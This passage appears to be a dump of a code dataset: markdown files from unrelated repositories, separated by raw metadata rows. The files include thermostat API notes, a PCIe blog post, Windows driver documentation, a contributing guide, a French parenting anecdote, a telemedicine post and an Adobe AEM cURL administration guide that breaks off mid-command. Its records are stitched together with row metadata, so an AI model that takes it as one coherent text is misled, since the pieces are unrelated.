* `heatSetPoint` - the temperature set point if heat is to be changed (ignored if bit 1 of flags is 0)
### SLSetSystemTime
Passed as an argument to the emitted `setSystemTime` event.
### SLVersionMessage
Passed as an argument to the emitted `version` event handler.
#### Properties
* `version` - a string representing the system's version
| 54.975352 | 705 | 0.769145 | eng_Latn | 0.988516 |
fa55cb66100501cc1acba93075ecfaf78245c97b | 57 | md | Markdown | core/README.md | mikbry/writ-re | ad1300d919b0a9b250db9a2ab22a563cc7232157 | [
"MIT"
] | null | null | null | core/README.md | mikbry/writ-re | ad1300d919b0a9b250db9a2ab22a563cc7232157 | [
"MIT"
] | null | null | null | core/README.md | mikbry/writ-re | ad1300d919b0a9b250db9a2ab22a563cc7232157 | [
"MIT"
] | null | null | null | # @writ-re/core
Core Rust library for write-re
## TODO | 11.4 | 30 | 0.684211 | eng_Latn | 0.94254 |
fa55cec53b55e5384a18390b5544367554cef2c4 | 16 | md | Markdown | README.md | durantchuente/test1 | 1133398d946a544703af9e1ccab05c886a442b67 | [
"MIT"
] | null | null | null | README.md | durantchuente/test1 | 1133398d946a544703af9e1ccab05c886a442b67 | [
"MIT"
] | null | null | null | README.md | durantchuente/test1 | 1133398d946a544703af9e1ccab05c886a442b67 | [
"MIT"
] | null | null | null | # test1-gohze
| 5.333333 | 13 | 0.625 | vie_Latn | 0.356036 |
fa5650e4bec3afd68b00b4137f69d7ea089c2561 | 2,022 | md | Markdown | _posts/2019-01-19-pcie.md | yduf/yduf.github.io | ffb34c791fc8962904c8d6f1c2245432745f6623 | [
"MIT"
] | null | null | null | _posts/2019-01-19-pcie.md | yduf/yduf.github.io | ffb34c791fc8962904c8d6f1c2245432745f6623 | [
"MIT"
] | 3 | 2019-09-29T13:42:27.000Z | 2021-10-06T20:20:31.000Z | _posts/2019-01-19-pcie.md | yduf/yduf.github.io | ffb34c791fc8962904c8d6f1c2245432745f6623 | [
"MIT"
] | null | null | null | ---
published: true
title: PCIe interface
tags: pc
---
## [What is PCIe?](https://www.overclock.net/forum/355-ssd/1489684-ssd-interface-comparison-pci-express-vs-sata.html)
Peripheral Component Interconnect Express, or PCIe, is a physical interconnect for motherboard expansion. Normally this is the connector slot you plug your graphics card, network card, sound card, or for storage purposes, a RAID card into. PCIe was designed to replace the older PCI, PCI-X, and AGP bus standards and to allow for more flexibility for expansion. Improvements include higher maximum bandwidth, lower I/O pin count and smaller physical footprint, better performance-scaling, more detailed error detection and reporting, and hot-plugging. The physical connector on the motherboard typically allows for up to 16 lanes for data transfer. A PCIe device that is an x4 device can fit into a PCIe x4 slot up to an x16 slot and still function. PCIe 1.0 allowed for 250MB/s per lane, PCIe 2.0 allows for 500MB/s per lane and the newest PCIe 3.0 allows for 1GB/s per lane.
**M.2** - Well now that you know what PCIe, SATA, and the different interconnects are, let us go into the new M.2 form factor. I am mentioning the M.2 standard because the Plextor M6e we have for testing is simply a M.2 SSD connected to a PCIe adapter. The M.2 standard is an improved revision of the mSATA connector design. It allows for more flexibility in the manufacturing of not only SSDs, Wi-Fi, Bluetooth, satellite navigation, near field communication (NFC), digital radio, Wireless Gigabit Alliance (WiGig), and wireless WAN (WWAN).
- [adapter](https://www.amazon.fr/MagiDeal-Express-SATAIII-Adaptateur-Combo/dp/B07F32BTQC/ref=pd_sbs_23_1?_encoding=UTF8&pd_rd_i=B07F32BTQC&pd_rd_r=8a72de1b-1c17-11e9-bc01-5d84e75cd9b8&pd_rd_w=AV6OP&pd_rd_wg=rvuOb&pf_rd_p=5d361e0c-9e85-4b01-8261-3ff932bec9c8&pf_rd_r=BFZGDEVAQMKXA127GDZ8&psc=1&refRID=BFZGDEVAQMKXA127GDZ8)
- [2][https://www.la-boutique-du-mineur.com/accueil/49-carte-adaptateur-port-m2-vers-port-pcie-1x.html)
| 144.428571 | 876 | 0.794263 | eng_Latn | 0.975168 |
fa57fa16f4b6cde5e6840bcc8a72c2a91b44e7b5 | 6,953 | md | Markdown | windows-driver-docs-pr/kernel/sending-irp-mn-query-power-or-irp-mn-set-power-for-device-power-states.md | cubisttriangle/windows-driver-docs | 99b179934a35c6f2bff9cf971b59a1a26d2fb73b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-driver-docs-pr/kernel/sending-irp-mn-query-power-or-irp-mn-set-power-for-device-power-states.md | cubisttriangle/windows-driver-docs | 99b179934a35c6f2bff9cf971b59a1a26d2fb73b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-driver-docs-pr/kernel/sending-irp-mn-query-power-or-irp-mn-set-power-for-device-power-states.md | cubisttriangle/windows-driver-docs | 99b179934a35c6f2bff9cf971b59a1a26d2fb73b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Sending IRP_MN_QUERY_POWER or IRP_MN_SET_POWER for Device Power States
description: Sending IRP_MN_QUERY_POWER or IRP_MN_SET_POWER for Device Power States
ms.assetid: 58f65138-abb9-4bb8-bf9b-14f17347e309
keywords: ["IRP_MN_SET_POWER", "IRP_MN_QUERY_POWER", "device power states WDK kernel", "query-power IRPs WDK power management", "power IRPs WDK kernel , device queries", "querying power state", "queuing IRPs", "device query power IRPs WDK kernel", "sending power state IRPs", "set-power IRPs WDK kernel", "device set power IRPs WDK kernel"]
ms.date: 06/16/2017
ms.localizationpriority: medium
---
# Sending IRP\_MN\_QUERY\_POWER or IRP\_MN\_SET\_POWER for Device Power States
A device power policy owner sends a device query-power IRP ([**IRP\_MN\_QUERY\_POWER**](./irp-mn-query-power.md)) to determine whether lower drivers can accommodate a change in device power state, and a device set-power IRP ([**IRP\_MN\_SET\_POWER**](./irp-mn-set-power.md)) to change the device power state. (This driver can also send a wait/wake IRP to enable its device to awaken in response to an external signal; see [Supporting Devices that Have Wake-Up Capabilities](supporting-devices-that-have-wake-up-capabilities.md) for details.)
The driver should send an [**IRP\_MN\_QUERY\_POWER**](./irp-mn-query-power.md) request when either of the following is true:
- The driver receives a system query-power IRP.
- The driver is preparing to put an idle device in a sleep state, so must query lower drivers to find out whether doing so is feasible.
The driver should send an [**IRP\_MN\_SET\_POWER**](./irp-mn-set-power.md) request when any of the following is true:
- The driver has determined that the device is idle and can be put to sleep.
- The device is sleeping and must re-enter the working state to handle waiting I/O.
- The driver receives a system set-power IRP.
A driver must not allocate its own power IRP; the power manager provides the [**PoRequestPowerIrp**](/windows-hardware/drivers/ddi/wdm/nf-wdm-porequestpowerirp) routine for this purpose. As [Rules for Handling Power IRPs](rules-for-handling-power-irps.md) explains, **PoRequestPowerIrp** allocates and sends the IRP, and in combination with **IoCallDriver** (in Windows 7 and Windows Vista), or **PoCallDriver** (in Windows Server 2003, Windows XP, and Windows 2000), ensures that all power requests are properly synchronized. Callers of **PoRequestPowerIrp** must be running at IRQL <= DISPATCH\_LEVEL.
The following is the prototype for this routine:
```cpp
NTSTATUS
PoRequestPowerIrp (
IN PDEVICE_OBJECT DeviceObject,
IN UCHAR MinorFunction,
IN POWER_STATE PowerState,
IN PREQUEST_POWER_COMPLETE CompletionFunction,
IN PVOID Context,
OUT PIRP *Irp OPTIONAL
);
```
To send the IRP, the driver calls **PoRequestPowerIrp**, specifying a pointer to the target device object in *DeviceObject*, the minor IRP code IRP\_MN\_SET\_POWER or IRP\_MN\_QUERY\_POWER in *MinorFunction*, the value **DevicePowerState** in the <em>PowerState</em>**.Type**, and a device power state in <em>PowerState</em>**.State**. In Windows 98/Me, *DeviceObject* must specify the PDO of the underlying device; in Windows 2000 and later versions of Windows, this value can point to either the PDO or an FDO of a driver in the same device stack.
If the driver must perform additional tasks after all other drivers have completed the IRP, it should pass a pointer to a power completion function in *CompletionFunction*. The I/O manager calls the *CompletionFunction* after calling all the *IoCompletion* routines set by drivers as they passed the IRP down the stack.
Whenever a device power policy owner sends a device power query IRP, it should subsequently send a device set-power IRP from the callback routine (*CompletionFunction*) that it specified in the call to **PoRequestPowerIrp**. If the query succeeded, the set-power IRP specifies the queried power state. If the query failed, the set-power IRP re-asserts the current device power state. Re-asserting the current state is important because drivers queue I/O in response to the query; the policy owner must send the set-power IRP to notify drivers in its device stack to begin processing queued I/O requests.
Keep in mind that the policy owner for a device not only sends the device power IRP but also handles the IRP as it is passed down the device stack. Therefore, such a driver often sets an *IoCompletion* routine (with [**IoSetCompletionRoutine**](/windows-hardware/drivers/ddi/wdm/nf-wdm-iosetcompletionroutine)) as part of its IRP-handling code, particularly when the device is powering up. The *IoCompletion* routine is called in sequence with *IoCompletion* routines set by other drivers and before the *CompletionFunction*. For further information, see [IoCompletion Routines for Device Power IRPs](iocompletion-routines-for-device-power-irps.md).
Because the IRP has been completed by all drivers when the *CompletionFunction* is called, the *CompletionFunction* must not call **IoCallDriver**, **PoCallDriver**, or **PoStartNextPowerIrp** with the IRP it originated. (It might, however, call these routines for a different power IRP.) Instead, this routine performs any additional actions required by the driver that originated the IRP. If the driver sent the device IRP in response to a system IRP, the *CompletionFunction* might complete the system IRP. For further information, see [Handling a System Set-Power IRP in a Device Power Policy Owner](handling-a-system-set-power-irp-in-a-device-power-policy-owner.md).
In response to the call to **PoRequestPowerIrp**, the power manager allocates a power IRP and sends it to the top of the device stack for the device. The power manager returns a pointer to the allocated IRP.
If no errors occur, **PoRequestPowerIrp** returns STATUS\_PENDING. This status means that the IRP has been sent successfully and is pending completion. The call fails if the power manager cannot allocate the IRP or if the caller has specified an invalid minor power IRP code.
Requests to power up a device must be handled first by the underlying bus driver for the device and then by each successively higher driver in the stack. Therefore, when sending a **PowerDeviceD0** request, the driver must ensure that its *CompletionFunction* performs required tasks after the IRP is complete and the device is powered on.
When powering off a device (**PowerDeviceD3**), each driver in the device stack must save all of its necessary context and do any necessary clean-up before sending the IRP to the next-lower driver. The extent of the context information and clean-up depends on the type of driver. A function driver must save hardware context; a filter driver might need to save its own software context. A *CompletionFunction* set in this situation can take actions associated with a completed power IRP, but the driver cannot access the device.
| 102.25 | 671 | 0.783115 | eng_Latn | 0.989886 |
fa586313a65e0d61a29b96623bb5cad26eec263a | 105 | md | Markdown | README.md | cemfatihkaya/dotnet-core-role-based-authorization | de0e9dfd5746472f84518f01babc10936cb8ebc1 | [
"MIT"
] | null | null | null | README.md | cemfatihkaya/dotnet-core-role-based-authorization | de0e9dfd5746472f84518f01babc10936cb8ebc1 | [
"MIT"
] | null | null | null | README.md | cemfatihkaya/dotnet-core-role-based-authorization | de0e9dfd5746472f84518f01babc10936cb8ebc1 | [
"MIT"
] | null | null | null | # dotnet-core-role-based-authorization
.NET Core ile Cookie Authentication ve Policy-Based Authorization
| 35 | 65 | 0.838095 | kor_Hang | 0.487079 |
fa588710ba8db7acadcf6cdc1fbd1344f95bcf30 | 61 | md | Markdown | README.md | davidribeiro05/gestor-de-projetos | bf65f25f3a0e91b91ad9f88d8abb1c1d056902a2 | [
"MIT"
] | null | null | null | README.md | davidribeiro05/gestor-de-projetos | bf65f25f3a0e91b91ad9f88d8abb1c1d056902a2 | [
"MIT"
] | null | null | null | README.md | davidribeiro05/gestor-de-projetos | bf65f25f3a0e91b91ad9f88d8abb1c1d056902a2 | [
"MIT"
] | null | null | null | ## Aplicação desenvolvida para realizar a gestão de projetos
| 30.5 | 60 | 0.819672 | por_Latn | 1.000009 |
fa58b2d3abe08f7fa0efdf965bdf16b4b165ba2f | 785 | md | Markdown | _posts/fr/papa/2016/2016-03-05-mini-hulk.md | lespacedunmatin/boris.schapira.dev | 255c622f86788d092beec1f2872d5f8ec1ae0993 | [
"MIT"
] | null | null | null | _posts/fr/papa/2016/2016-03-05-mini-hulk.md | lespacedunmatin/boris.schapira.dev | 255c622f86788d092beec1f2872d5f8ec1ae0993 | [
"MIT"
] | null | null | null | _posts/fr/papa/2016/2016-03-05-mini-hulk.md | lespacedunmatin/boris.schapira.dev | 255c622f86788d092beec1f2872d5f8ec1ae0993 | [
"MIT"
] | 1 | 2020-11-17T03:44:10.000Z | 2020-11-17T03:44:10.000Z | ---
title: 'Mini Hulk'
---
Nous parlons de la vie sous-marine. Je leur explique qu'il y a plein d'animaux
qu'on ne connait pas et que s'ils veulent, nous irons voir des vidéos sur
Internet. En revanche, il faudra se passer de leur mère, qui a un peu peur des
animaux sous-marins.
Le petit se retourne immédiatement vers elle, l'air farouche :
> — Tu as peur des zanimaux sous-malins, Maman ?
> — Oui mon chat, ça me fait un peu peur.
> — Tu sais, si tu as peur, tu peux les taper ! Pan, bam, pam ! Je peux les
> taper pou toi si tu veux, Maman !
Bien sûr, nous l'avons corrigé et avons expliqué qu'il ne fallait pas taper
(rien, ni personne). Néanmoins, je ne peux pas m'empêcher de sourire devant ce
petit bout de tête brûlée, aussi téméraire que son grand frère est prudent.
| 39.25 | 78 | 0.728662 | fra_Latn | 0.993053 |
fa58f7cb46ffa0adff0356f32cae6cff484ec518 | 1,336 | md | Markdown | _posts/2021-05-07-Blog-10.md | M9771/M9771.github.io | 9e5825699a0fe514db0d1459d062067d0c4729c0 | [
"MIT"
] | null | null | null | _posts/2021-05-07-Blog-10.md | M9771/M9771.github.io | 9e5825699a0fe514db0d1459d062067d0c4729c0 | [
"MIT"
] | null | null | null | _posts/2021-05-07-Blog-10.md | M9771/M9771.github.io | 9e5825699a0fe514db0d1459d062067d0c4729c0 | [
"MIT"
] | null | null | null | ---
layout: post
title: Blog 10
date: '2021-05-07 22:08:00 -800'
categories: jekyll Senior-Design
published: true
---
## Telemedicine
Telemedicine is changing the world for both doctors and patients. It is for healthcare professionals to evaluate, diagnose, and treat patients virtually from a platform. This is very beneficial because they are able to attend to their patients from virtually anywhere. Through striking evolution in the last decade, it is becoming more and more popular in the American Healthcare infrastructure. Although there are many benefits to telemedicine, there are also a lot of flaws.
A lot of patients are not willing to share their personal health information virtually. This is especially when they do not have a relationship with the doctor. The platform that hosts the telemedicine application has to be very secure and able to comply with the HIPPA guidelines at all times. Patient confidentiality is of utmost importance.
The most important and beneficial part of telemedicine is that doctors can now see patients from around the world where people are less fortunate. All one has to have a proper communication set up, which is wi-fi and a computer with a camera and microphone. This can open many new doors as more and more people that are underprivileged can be seen and properly diagnosed.
| 74.222222 | 477 | 0.804641 | eng_Latn | 0.999957 |
fa59440a78c49b38800193c58160441faa693230 | 1,055 | md | Markdown | docs/framework/unmanaged-api/debugging/icordebugeditandcontinuesnapshot-getrwdatarva-method.md | felipealbuquerq/docs.pt-br | 6808f7d63212e650a0ecadd7f5cd058594fd0d38 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icordebugeditandcontinuesnapshot-getrwdatarva-method.md | felipealbuquerq/docs.pt-br | 6808f7d63212e650a0ecadd7f5cd058594fd0d38 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icordebugeditandcontinuesnapshot-getrwdatarva-method.md | felipealbuquerq/docs.pt-br | 6808f7d63212e650a0ecadd7f5cd058594fd0d38 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Método ICorDebugEditAndContinueSnapshot::GetRwDataRVA
ms.date: 03/30/2017
api_name:
- ICorDebugEditAndContinueSnapshot.GetRwDataRVA
api_location:
- mscordbi.dll
api_type:
- COM
f1_keywords:
- ICorDebugEditAndContinueSnapshot::GetRwDataRVA
helpviewer_keywords:
- GetRwDataRVA method [.NET Framework debugging]
- ICorDebugEditAndContinueSnapshot::GetRwDataRVA method [.NET Framework debugging]
ms.assetid: 3e07b233-dd41-45ba-a4f9-662e4b006f1f
topic_type:
- apiref
author: rpetrusha
ms.author: ronpet
ms.openlocfilehash: 31ad3032b50298e08f349049adab8aa18a09f12e
ms.sourcegitcommit: 9b552addadfb57fab0b9e7852ed4f1f1b8a42f8e
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 04/23/2019
ms.locfileid: "61996060"
---
# <a name="icordebugeditandcontinuesnapshotgetrwdatarva-method"></a>Método ICorDebugEditAndContinueSnapshot::GetRwDataRVA
`GetRwDataRVA` é obsoleto. Não chame este método.
## <a name="see-also"></a>Consulte também
- [Depurando interfaces](../../../../docs/framework/unmanaged-api/debugging/debugging-interfaces.md)
| 31.969697 | 121 | 0.818009 | yue_Hant | 0.37588 |
fa595c11ee8b168017749af09fa5363c4e1ab762 | 5,335 | md | Markdown | docs/CONTRIBUTING.md | embeddedartistry/libcpp | 3d809a75669f3f3600a57ac2ab30f71591338bfb | [
"MIT"
] | 42 | 2018-10-04T11:03:14.000Z | 2022-03-13T18:03:59.000Z | docs/CONTRIBUTING.md | embeddedartistry/libcpp | 3d809a75669f3f3600a57ac2ab30f71591338bfb | [
"MIT"
] | 32 | 2018-04-16T17:16:33.000Z | 2020-10-19T21:25:45.000Z | docs/CONTRIBUTING.md | embeddedartistry/libcpp | 3d809a75669f3f3600a57ac2ab30f71591338bfb | [
"MIT"
] | 5 | 2019-07-24T19:28:59.000Z | 2021-04-15T18:17:55.000Z | # Contributing Guide
Welcome! We love receiving contributions from the community, so thanks for stopping by! There are many ways to contribute, including submitting bug reports, improving documentation, submitting feature requests, reviewing new submissions, or contributing code that can be incorporated into the project.
This document describes the Embedded Artistry development process. Following these guidelines shows that you respect the time and effort of the developers managing this project. In return, you will be shown respect in addressing your issue, reviewing your changes, and incorporating your contributions.
**Table of Contents:**
1. [Code of Conduct](#code-of-conduct)
2. [Important Resources](#important-resources)
3. [Questions](#questions)
7. [Contributing to the Project](#contributing-to-the-project)
2. [Dependencies](#dependencies)
3. [Development Process](#development-process)
4. [Building the Project](#building-the-project)
5. [Adding New Implementations](#adding-new-implementatinos)
5. [Adding New Tests](#adding-new-tests)
9. [Community](#community)
## Code of Conduct
By participating in this project, you agree to abide by the Embedded Artistry [Code of Conduct](CODE_OF_CONDUCT.md). We expect all contributors to follow the [Code of Conduct](CODE_OF_CONDUCT.md) and to treat fellow humans with respect.
## Important Resources
This project is managed on GitHub:
* [GitHub Project Page](https://github.com/embeddedartistry/libcpp/)
* [GitHub Issue Tracker](https://github.com/embeddedartistry/libcpp/issues)
Questions can also be submitted [on the Embedded Artistry website](https://embeddedartistry.com/contact) and in the [Embedded Artistry Forum](https://embeddedartistry.com/community/embedded-artistry-oss/).
Useful Documentation:
* [Library Documentation][9]
* [cppreference (API notes)](http://en.cppreference.com)
## Questions
Please submit your questions in the following ways:
* Filing a new [GitHub Issue](https://github.com/embeddedartistry/libcpp/issues)
* [Submitting a question on the Embedded Artistry website](https://embeddedartistry.com/contact)
* [Submitting a question on the Embedded Artistry forum](https://embeddedartistry.com/community/embedded-artistry-oss/)
* Asking a question [on Twitter: (mbeddedartistry)](https://twitter.com/mbeddedartistry/).
## New to Open Source?
If you've never worked with an open source project before, please check out our [Open Source Contribution Guide](https://embeddedartistry.com/fieldatlas/open-source-contribution-guide/), which contains information on:
* Resources for people new to open-source development
* How to find something to work on
* How to report issues
* Branching and PR guidelines for our projects
* Style guidelines for our projects
## Contributing to the Project
If you're interested in contributing = to this project, read on! Don't know where to start? Take a look at the [Open Source Contribution Guide](https://embeddedartistry.com/fieldatlas/open-source-contribution-guide/) section for information on finding beginner-friendly issues on our projects.
Please review the following guides to learn about our development process:
* [Open Source Contribution Guide](https://embeddedartistry.com/fieldatlas/open-source-contribution-guide/)
* Resources for people new to open-source development
- How to find something to work on
- How to report issues
- Branching and PR guidelines for our projects
- Style guidelines for our projects
* [Embedded Artistry's GitHub Process](https://embeddedartistry.com/fieldatlas/embedded-artistrys-github-process/), which discusses how we handle PRs and integrate changes
* [Source Control Commit Guidelines](https://embeddedartistry.com/fieldatlas/source-control-commit-guidelines/), which describes our guidelines for commit messages
**If you have any questions about this process, please [ask us for help!](#questions)**
### Dependencies
The dependencies for [Embedded Artistry's standardized Meson build system](https://embeddedartistry.com/fieldatlas/embedded-artistrys-standardized-meson-build-system/) are described [on our website](https://embeddedartistry.com/fieldatlas/embedded-artistrys-standardized-meson-build-system/).
In addition to those dependencies, you will need the following for this repository:
* [`git-lfs`](https://git-lfs.github.com) is used to store binary files
### Development Process
`master` contains the latest code for this project, and new versions are tagged nightly.
Please branch from `master` for any new changes. Once you are ready to merge changes, open a pull request. The build server will test and analyze the branch to ensure it can be safely merged.
### Building the Project
This project uses [Embedded Artistry's standardized Meson build system](https://embeddedartistry.com/fieldatlas/embedded-artistrys-standardized-meson-build-system/). Complete instructions can be found [on our website](https://embeddedartistry.com/fieldatlas/embedded-artistrys-standardized-meson-build-system/).
## Community
Anyone interested in active conversation regarding this project should [join the Embedded Artistry community]https://embeddedartistry.com/community/embedded-artistry-oss/).
You can also [reach out on Twitter: mbeddedartistry](https://twitter.com/mbeddedartistry/).
| 54.438776 | 311 | 0.789316 | eng_Latn | 0.964035 |
fa596112e3e82f4cb744c6cb0c17ced1ee498da9 | 2,068 | md | Markdown | AlchemyInsights/onenote-theme-catch-all.md | isabella232/OfficeDocs-AlchemyInsights-pr.pt-BR | 61447e6f79e6a5ca40e5e50168da971230d5f9b7 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-05-19T19:07:30.000Z | 2020-05-19T19:07:30.000Z | AlchemyInsights/onenote-theme-catch-all.md | isabella232/OfficeDocs-AlchemyInsights-pr.pt-BR | 61447e6f79e6a5ca40e5e50168da971230d5f9b7 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2022-02-09T06:58:01.000Z | 2022-02-09T06:58:58.000Z | AlchemyInsights/onenote-theme-catch-all.md | isabella232/OfficeDocs-AlchemyInsights-pr.pt-BR | 61447e6f79e6a5ca40e5e50168da971230d5f9b7 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2019-10-11T19:14:27.000Z | 2021-10-13T10:06:06.000Z | ---
title: OneNote tema capturar todos
ms.author: pebaum
author: pebaum
manager: scotv
ms.audience: Admin
ms.topic: article
ms.service: o365-administration
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Normal
ms.collection: Adm_O365
ms.custom:
- "9000755"
- "2695"
ms.openlocfilehash: d72693900cc2bf0824ae119b8d2ba48e7376765a621eb9f31eb0fe053735f0b0
ms.sourcegitcommit: b5f7da89a650d2915dc652449623c78be6247175
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 08/05/2021
ms.locfileid: "54112864"
---
# <a name="common-issues-and-resolutions-with-onenote"></a>Problemas comuns e resoluções com OneNote
Aqui estão alguns tópicos OneNote solicitados com frequência:
- [Correção de problemas](https://support.office.com/article/299495ef-66d1-448f-90c1-b785a6968d45) de sincronização - para resolver problemas mais comuns relacionados OneNote sincronização, use as etapas em [Corrigir](https://support.office.com/article/Fix-issues-when-you-can-t-sync-OneNote-299495ef-66d1-448f-90c1-b785a6968d45)problemas quando não puder sincronizar OneNote .
- Use [OneNote no Teams](https://support.microsoft.com/office/0ec78cc3-ba3b-4279-a88e-aa40af9865c2)
- [Use OneNote Bloco de Anotações](https://support.office.com/article/bd77f11f-27cd-4d41-bfbd-2b11799f1440) de Classe Teams perguntas sobre como configurar um Bloco de Anotações de Classe no Teams.
- [Mover bloco de anotações para a nuvem](https://support.office.com/article/d5c28b91-7b9c-45be-8f0c-529bdbba019a).
- [Solução de problemas ao mover blocos de anotações para a nuvem.](https://support.office.com/article/70528107-11dc-4f3f-b695-b150059dfd78)
- [Instalar o OneNote 2016](https://support.office.com/article/c08068d8-b517-4464-9ff2-132cb9c45c08) – a partir de março de 2020, quando você instalar o Office 365 ou o Office 2019, o aplicativo de área de trabalho do OneNote será instalado junto com os aplicativos de área de trabalho word, PowerPoint e Excel desktop.
- [Exportar e importar OneNote blocos de anotações](https://support.office.com/article/a4b60da5-8f33-464e-b1ba-b95ce540f309).
| 53.025641 | 377 | 0.805126 | por_Latn | 0.868684 |
fa5a1bd54d7e890ed4c143730eb1398b896683a9 | 438 | md | Markdown | profile/README.md | Apps4Devs/.github | df55d3585b0e41ce859e21aa58a7a9a39dd1d98a | [
"MIT"
] | 1 | 2022-01-13T14:15:25.000Z | 2022-01-13T14:15:25.000Z | profile/README.md | Apps4Devs/.github | df55d3585b0e41ce859e21aa58a7a9a39dd1d98a | [
"MIT"
] | null | null | null | profile/README.md | Apps4Devs/.github | df55d3585b0e41ce859e21aa58a7a9a39dd1d98a | [
"MIT"
] | null | null | null | # Welcome to Apps4Devs Labs 🚀
### Hi there Apps4Devs developers! 👋
🙋♀️ A short introduction - our organization is based on Android and iOS app templates for all level of developers, web engineers and software engineers.
👩💻 Useful resources - access on our website to get more information: https://www.apps4devs.com/

| 43.8 | 153 | 0.767123 | eng_Latn | 0.77654 |
fa5af9040b83df70684883bd13ca2453e73c43cc | 15,157 | md | Markdown | help/sites-administering/curl.md | karishda27/experience-manager-65.en | 62c558f7c9c4e90c33438cb6c3a3af64742f7009 | [
"MIT"
] | null | null | null | help/sites-administering/curl.md | karishda27/experience-manager-65.en | 62c558f7c9c4e90c33438cb6c3a3af64742f7009 | [
"MIT"
] | null | null | null | help/sites-administering/curl.md | karishda27/experience-manager-65.en | 62c558f7c9c4e90c33438cb6c3a3af64742f7009 | [
"MIT"
] | null | null | null | ---
title: Using cURL with AEM
seo-title: Using cURL with AEM
description: Learn how to use cURL with AEM.
seo-description: Learn how to use cURL with AEM.
uuid: 771b9acc-ff3a-41c9-9fee-7e5d2183f311
contentOwner: Silviu Raiman
products: SG_EXPERIENCEMANAGER/6.5/SITES
topic-tags: operations
content-type: reference
discoiquuid: d4ceb82e-2889-4507-af22-b051af83be38
---
# Using cURL with AEM{#using-curl-with-aem}
Administrators often need to automate or simplify common tasks within any system. In AEM for example, managing users, installing packages, and managing OSGi bundles are tasks that must be commonly done.
Because of the RESTful nature of the Sling framework upon which AEM is built, most any task can be reduced to a URL call. cURL can be used to execute such URL calls and can be a useful tool for AEM administrators.
## What is cURL {#what-is-curl}
cURL is an open-source command-line tool used to perform URL manipulations. It supports a wide range of internet protocols including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, DAP, DICT, TELNET, FILE, IMAP, POP3, SMTP, and RTSP.
cURL is a well-established and widely-used tool for getting or sending data using the URL syntax and was originally released in 1997. The name cURL originally meant "see URL."
Because of the RESTful nature of the Sling framework upon which AEM is built, most tasks can be reduced to a URL call, which can be executed with cURL. [Content manipulation tasks](/help/sites-administering/curl.md#common-content-manipulation-aem-curl-commands) such as activating pages, and starting workflows as well as [operational tasks](/help/sites-administering/curl.md#common-operational-aem-curl-commands) such as package management and managing users can be automated using cURL. In addition you can [create your own cURL](/help/sites-administering/curl.md#building-a-curl-ready-aem-command) commands for most tasks in AEM.
>[!NOTE]
>
>Any AEM command executed through cURL has to be authorized just as any user to AEM. All ACLs and access rights are respected when using cURL to execute an AEM command.
## Downloading cURL {#downloading-curl}
cURL is a standard part of macOS and some Linux distros. However it is avaialble for most every operating system. The latest downloads can be found at [https://curl.haxx.se/download.html](https://curl.haxx.se/download.html).
cURL's source repository can be found on GitHub as well.
## Building a cURL-Ready AEM Command {#building-a-curl-ready-aem-command}
cURL commands can be built for most operations in AEM such as triggering workflows, checking OSGi configurations, triggering JMX commands, creating replication agents, and much more.
To find the exact command you need for your particular operation, you need to use the developer tools in your browser to capture the POST call to the server when you execute the AEM command.
The following steps describe how to do this using the creation of a new page within the Chrome browser as an example.
1. Prepare the action you wish to invoke within AEM. In this case, we have proceded to the end of the **Create Page** wizard, but have not yet clicked **Create**.

1. Start the developer tools and select the **Network** tab. Click the **Preserve log** option before clearing the console.

1. Click **Create** in the **Create Page** wizard to actually create the workflow.
1. Right-click on the resulting POST action and select **Copy** -> **Copy as cURL**.

1. Copy the cURL command to a text editor and remove all headers from the command, which start with `-H` (highligted in blue in the image below) and add the proper authentication parameter such as `-u admin:admin`.

1. Execute the cURL command via the command line and view the response.

## Common Operational AEM cURL Commands {#common-operational-aem-curl-commands}
Here is a list of AEM cURL commands for common administrative and operational tasks.
>[!NOTE]
>
>The following examples assume that AEM is running on `localhost` on port `4502` and uses the user `admin` with password `admin`. Additional command placeholders are set in angle brackets.
### Package Management {#package-management}
#### Create a Package {#create-a-package}
```shell
curl -u admin:admin -X POST http://localhost:4502/crx/packmgr/service/.json/etc/packages/mycontent.zip?cmd=create -d packageName=<name> -d groupName=<name>
```
#### Preview a Package {#preview-a-package}
```shell
curl -u admin:admin -X POST http://localhost:4502/crx/packmgr/service/.json/etc/packages/mycontent.zip?cmd=preview
```
#### List Package Content {#list-package-content}
```shell
curl -u admin:admin -X POST http://localhost:4502/crx/packmgr/service/console.html/etc/packages/mycontent.zip?cmd=contents
```
#### Build a Package {#build-a-package}
```shell
curl -X POST http://localhost:4502/crx/packmgr/service/.json/etc/packages/mycontent.zip?cmd=build
```
#### Rewrap a Package {#rewrap-a-package}
```shell
curl -u admin:admin -X POST http://localhost:4502/crx/packmgr/service/.json/etc/packages/mycontent.zip?cmd=rewrap
```
#### Rename a Package {#rename-a-package}
```shell
curl -u admin:admin -X POST -Fname=<New Name> http://localhost:4502/etc/packages/<Group Name>/<Package Name>.zip/jcr:content/vlt:definition
```
#### Upload a Package {#upload-a-package}
```shell
curl -u admin:admin -F cmd=upload -F force=true -F package=@test.zip http://localhost:4502/crx/packmgr/service/.json
```
#### Install a Package {#install-a-package}
```shell
curl -u admin:admin -F cmd=install http://localhost:4502/crx/packmgr/service/.json/etc/packages/my_packages/test.zip
```
#### Uninstall a Package {#uninstall-a-package}
```shell
curl -u admin:admin -F cmd=uninstall http://localhost:4502/crx/packmgr/service/.json/etc/packages/my_packages/test.zip
```
#### Delete a Package {#delete-a-package}
```shell
curl -u admin:admin -F cmd=delete http://localhost:4502/crx/packmgr/service/.json/etc/packages/my_packages/test.zip
```
#### Download a Package {#download-a-package}
```shell
curl -u admin:admin http://localhost:4502/etc/packages/my_packages/test.zip
```
### User Management {#user-management}
#### Create a New User {#create-a-new-user}
```shell
